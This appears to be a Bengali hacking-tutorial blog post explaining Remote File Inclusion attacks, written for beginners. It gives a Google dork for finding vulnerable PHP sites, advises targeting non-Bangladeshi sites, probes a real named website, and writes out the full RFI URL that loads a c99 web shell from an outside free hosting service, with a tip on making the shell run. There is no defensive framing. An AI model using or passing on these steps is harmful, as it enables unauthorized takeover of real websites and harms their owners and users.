RFI (Remote File Inclusion) হ্যাকিং!

আসসালামু আলাইকুম,
কেমন আছেন?
গত কিছু দিন যাবত আপনাদের সাথে আমি হ্যাকিং ওয়ার্ল্ডের নানা কন্টেন্ট শেয়ার করছি। আমি নিজেও একজন শিক্ষানবিস বা নিউবাই। তাও যত জানি, আপনাদের জন্য উজার করে দিচ্ছি। আমাদের সিকিউরিটি অ্যানালিস্ট কমল ভাই এই বিষয়ে এক্সপার্ট এবং তার কল্যাণেই আমাদের এই জিআর+ ওয়েবসাইট টিকে আছে। ধন্যবাদ তাকে।

আজ দেখাব Remote file inclusion হ্যাকিং।
রিমোট ফাইল ইনক্লুশন বাংলা করলে দাড়ায় দূরবর্তী ফাইল প্রবেশ করানো। মানে আপনি এই হ্যাকিং মেথডের সাহায্যে কোন ওয়েবসাইটে অন্ন সার্ভারে হোস্ট করা প্রোগ্রাম শেল হিসেবে চালাতে পারবেন।
Remote file inclusion হ্যাকিং, একে সংক্ষেপে বলে RFI হ্যাকিং। এটি অনান্য হ্যাকিং মেথডের মধ্যে এটিও একটি অন্যতম জনপ্রিয় মেথড। অন্যন্যা পদ্ধতির মতো এই পদ্ধতিতেও আপনাকে ওয়েবসাইটের vulnerability বের করতে হবে। এখন ৯০% ফায়ার ওয়াল আরএফআই ইঞ্জেকশান রুখতে পারে, তাই এই মেথড সহজে কাজে আসে না।



এখন গুগল ডরক দিয়ে সারচ করে ভালনারেবল সাইট খুজে নিন, চেস্টা করবেন দেশি ওয়েবসাইট গুলো বাদ দিয়ে চলতে।
এইযে গুগল ডরক,

inurl:index.php?page=

উপরের ডকটি গুগলে নিয়ে সার্চ দিন। তাহলে আপনাকে “index.php?page=” এই টাইপের যত ওয়েবসাইট আছে, সবগুলো দেখতে পাবেন।
এখন ভালনারেবল কিনা পরীক্ষা করতে হবে।
নিচের লিঙ্কের মত পরিক্ষা করে দেখুন।

http://www.targetsite.com/index.php?page=http://blog.grplusbd.net

এখন মনে করেন আমি আমি http://www.cbspk.com/ এই সাইটটি খুঁজে পেয়েছি। এখন আমরা চাইব এটা vulnerable কি না। তাহলে লিখুন….

http://www.cbspk.com/v2/index.php?page=http://www.tunerpage.com


তাহলে এটি দেখাবে…




এখন যদি উক্ত ওয়েবসাইটটি অন্য ওয়েবসাইট নিয়ে খোলে তাহলে বুঝবেন যে এই ওয়েব সাইটে RFI ইঞ্জেকশান দেয়া যাবে। এবার আসুন পরের ধাপে…

এরপর সাধারণত হ্যাকাররা তার ভিকটিমের ওয়েবসাইটে যে কোন Shells আপলোড করে। বেশিরভাগ হ্যাকাররা c99 shell বা r57 shell আপলোড করে। 
আমি আপনাদের দেখাব c99 shell আপলোড করা। 

এজন্য হ্যাকাররা যে কোন একটি ওয়েবহোষ্টটিং সাইটে তাদের সেল আপলোড করে নেয়। যেমন- ripway.com, 110mb.comইত্যাদি। এখন মনে করেন আমি ripway.com এই সাইটে সেল আপলোড করলাম। তাহলে আমার লিংক হবে…

http://h1.ripway.com/tjunselected/c99shell.php?

এবার হ্যাকার ওয়েবসাইটটিতে একটি কমান্ড দিবে। কমান্ডটি হবে

http://www.cbspk.com/v2/index.php?page=http://h1.ripway.com/tjunselected/c99shell.php?

এখন তাহলে এটি ওয়েবসাইট দেখব। দেখেন, কি দেখেন ?
তবে অবশ্যই মনে রাখবেন লিংকের শেষে “ ? ” প্রশ্নবোধক চিহ্নটি লাগিয়ে দিবেন। নতুবা আপনার শেল কাজ করবে না।

By Unselected Tuner

শেয়ার করুন

লেখকঃ

আমি তাওসিফ তুরাবি, অনলাইনাম (অনলাইন + নাম) ব্লগার তাওসিফ। এখন, ২০১৬ পর্যন্ত আমি ১৬ বছরের এক কিশোর। পড়াশোনা করি শহীদ পুলিশ স্মৃতি কলেজে। টেক ব্লগ লিখতে ভালবাসি। সাইন্স ফিকশন আর গল্প লিখতে পছন্দ করি।  জিআর+ ব্লগের এর একজন প্রতিষ্ঠাতা অ্যাডমিন।
আমাদের একটা ওয়েব ডেভেলপার ফার্ম আছে যার নাম জিআর+ আইটি বাংলাদেশ
এছাড়া আমার ব্যাক্তিগত ব্লগ রয়েছে। আমার ফেসবুক আইডিতে আমার সাথে সর্বক্ষণ যোগাযোগ করতে পারবেন। 


পূর্ববর্তী পোষ্ট
পরবর্তী পোষ্ট